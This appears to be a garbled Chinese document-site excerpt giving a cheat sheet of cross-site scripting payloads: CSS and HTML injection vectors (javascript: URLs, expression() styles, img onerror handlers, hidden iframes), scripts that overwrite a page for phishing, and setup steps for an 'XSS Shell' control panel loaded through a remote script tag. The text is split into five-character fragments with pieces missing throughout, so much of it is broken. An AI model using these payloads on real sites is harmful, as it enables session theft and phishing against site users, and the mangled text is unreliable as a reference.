文档介绍：CSS b ody{b ackgr ound: url(j avasc ript: alert ('XSS '))} ***@impo rt "h ttp:/ /www. guets m/xss .css" ; HTML <div style ="wid th:0; heigh t:0;b ackgr ound: url(j avasc ript: docum nload =func tion( ){ale rt('X SS'); });"> </div > <DI V sty le="S ec:ex press ion_r (aler t(/XS S/)); "> <T ABLE BACKG ROUND ="jav ascri pt:al ert(' XSS') "> <I NPUT onkey up="a lert( 'XSS' );"> <link rel= "styl eshee t" ty pe="t ext/c ss" h ref=" http: //www .guet om/xs "></l ink> IM AGE < img s rc="j avasc ript: alert (/XSS /)"/> <img src= ""on error =aler t("XS S")> <img src=" #" st yle=" Sec:e xpres sion_ r(ale rt(/X SS/)) ;"> < img o nmous eover ="ale rt('X SS')" > <ifra me sr c=htt p://w etsec .com/ widt h=0 h eight =0></ ifram e> 修改页面< scrip t> wi ndow. onloa d=fun ction Rewr ite() { doc ument .open (); d ocume ear() ;doc ument .writ e("At tack" ); do cumen se(); } </ scrip t>重写页面<scri pt> f uncti on Ph ish() {info ="重写 HTML 代码";d ocume ite(i nfo); } fun ction doit (){se tTime out(" Phish ()", 1000 );} d oit() </sc ript> XSS shell http ://la rtcul / appli catio n/xss shell / 管理端配置 ad min 文件夹、 db文件夹、 xs sshel 1修改 d b\she b文件名 2修改 ad min\d 中 Cons t DBP ATH 的数据库路径及 Trim( Pass) 的密码 3修改 xss shell .asp 中 SERVE R的域名 3访问 ad min\d efaul 进行管理客户端代码<scr ipts rc="h ttp:/ /域名/x ssshe p?v=3 36699 "></s cript > 获